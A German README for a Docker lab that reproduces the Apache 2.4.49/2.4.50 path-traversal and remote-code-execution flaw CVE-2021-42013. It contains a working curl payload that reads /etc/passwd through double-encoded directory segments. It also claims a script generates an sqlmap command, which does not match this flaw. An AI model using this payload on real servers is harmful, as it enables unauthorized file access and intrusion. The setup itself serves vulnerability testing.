
CVE: 2021-42013 Getestet auf: 2.4.49 und 2.4.50 Beschreibung: Pfad-Traversal- oder Remotecodeausführungs-Schwachstellen in Apache 2.4.49 und 2.4.50
Dieses Projekt zielt darauf ab, eine bestimmte Schwachstelle mit Docker zu dockerisieren. Ziel ist es, eine isolierte Umgebung zu schaffen, in der die Schwachstelle sicher ausgenutzt und getestet werden kann.
Apache HTTP Server 2.4.50 – Remote Code Execution && Path Traversal
Um dieses Projekt auszuführen, müssen Sie auf Ihrem Rechner Folgendes installiert haben:
Sobald die Voraussetzungen installiert sind, können Sie dieses Git-Repository auf Ihren Rechner klonen:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
Wechseln Sie anschließend in das Verzeichnis und führen Sie den folgenden Befehl aus, um die verwundbare Umgebung einzurichten:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
Greifen Sie anschließend unter http://localhost:8000 auf die Anwendung zu. Wenn alles gut geht, sollte „It works“ angezeigt werden.
Die Ausführung des folgenden Payloads mit curl zeigt, dass das Ziel verwundbar ist. Das Skript generiert den entsprechenden sqlmap-Befehl, um die Schwachstelle auszunutzen.
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
Dieser Payload kann ohne Zustimmung des Benutzers direkt auf Benutzerinformationen im System zugreifen.
Sobald wir die CGI- oder CGID-Module auf dem Server aktiviert haben, ermöglicht diese Schwachstelle einem Angreifer die Ausführung beliebiger Befehle.